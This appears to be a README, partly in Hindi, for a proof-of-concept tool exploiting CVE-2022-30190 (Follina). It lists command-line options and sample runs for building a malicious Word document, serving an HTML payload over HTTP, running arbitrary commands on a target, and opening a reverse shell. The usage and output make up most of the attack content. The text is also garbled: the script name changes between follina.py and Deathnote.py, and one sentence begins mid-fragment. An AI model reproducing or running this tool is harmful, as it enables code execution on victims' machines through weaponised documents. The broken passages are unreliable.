
Proof of Concept of CVE-2022-30190
जब MSDT को Word जैसे कॉलिंग एप्लिकेशन से URL प्रोटोकॉल का उपयोग करके बुलाया जाता है, तो एक रिमोट कोड निष्पादन भेद्यता मौजूद होती है। इस भेद्यता का सफलतापूर्वक शोषण करने वाला हमलावर कॉलिंग एप्लिकेशन के विशेषाधिकारों के साथ मनमाना कोड चला सकता है। हमलावर तब उपयोगकर्ता के अधिकारों द्वारा अनुमत संदर्भ में प्रोग्राम स्थापित कर सकता है, डेटा देख, बदल या हटा सकता है, या नए खाते बना सकता है।
एक दुर्भावनापूर्ण Microsoft Word दस्तावेज़ के साथ "Deathnote" MS-MSDT हमला बनाएं और एक HTTP सर्वर के साथ पेलोड को स्टेज करें।
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND, -c COMMAND
command to run on the target (default: Notepad)
--output OUTPUT, -o OUTPUT
output maldoc file (default: ./Deathnote.doc)
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
notepad.exe चलाएं:
$ python3 Deathnote.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./Deathnote.doc
[+] serving html payload on :8000
calc.exe चलाएं:
$ python3 Deathnote.py -c "calc"

C:\Windows\Tasks में रखता है। यह बाइनरी को साफ नहीं करता है। यह एंटीवायरस डिटेक्शन को ट्रिगर करेगा जब तक कि AV अक्षम न किया गया हो।reverse shell प्राप्त करें:
python3 Deathnote.py -p 1234